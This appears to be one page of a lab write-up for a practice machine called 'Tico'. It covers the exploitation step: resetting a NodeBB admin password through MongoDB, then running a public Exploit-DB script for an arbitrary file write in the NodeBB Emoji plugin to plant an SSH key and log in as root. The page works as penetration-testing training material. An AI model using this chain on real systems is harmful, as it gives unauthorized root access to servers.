🐧
Tico
  • Tico
    • Summary
  • Enumeration
    • TCP
    • UDP
    • 80 - Web Services
      • Nikto
      • Dirb Extensions
      • Dirsearch
      • goBuster
      • Robots
      • WhatWeb
    • 8080 - WebServices
      • Nikto
      • Dirb Extensions
      • Dirsearch
      • goBuster
      • Robots
      • WhatWeb
    • Other Services
      • FTP
      • MongoDB
      • Memcached 1.5.6
  • Exploitation
  • Priv Escalation
  • Notes
Powered by GitBook
On this page

Exploitation

PreviousMemcached 1.5.6NextPriv Escalation

Last updated 2 years ago

After gaining admin access to the mongo database I updated the password of the nodebb application

After generating our own idrsa and replacing it with the root idRsa we were able to log in as root. 

ssh-keygen -t rsa -N '' -f ~/.ssh/id_rsa
Generating public/private rsa key pair.
Your identification has been saved in /home/kali/.ssh/id_rsa
Your public key has been saved in /home/kali/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:77ufSzZu/0b3gdzFwZOzihQewkazcg5T4qZ19is9l2M kali@kali
The key's randomart image is:
+---[RSA 3072]----+
|       .o+    . .|
|      . o+oo   * |
|       B.=o o  .=|
|      + O .o   .o|
|     .  S...o + .|
|         ....+.oo|
|         ..++E .+|
|         ..+=o. o|
|          +==o.o.|
+----[SHA256]-----+

python3 /usr/share/exploitdb/exploits/multiple/webapps/49813.py 
[+] Login successful
[+] Emoji plugin is installed
[+] Successfully uploaded file

LogoNodeBB Plugin Emoji 3.2.1 - Arbitrary File WriteExploit Database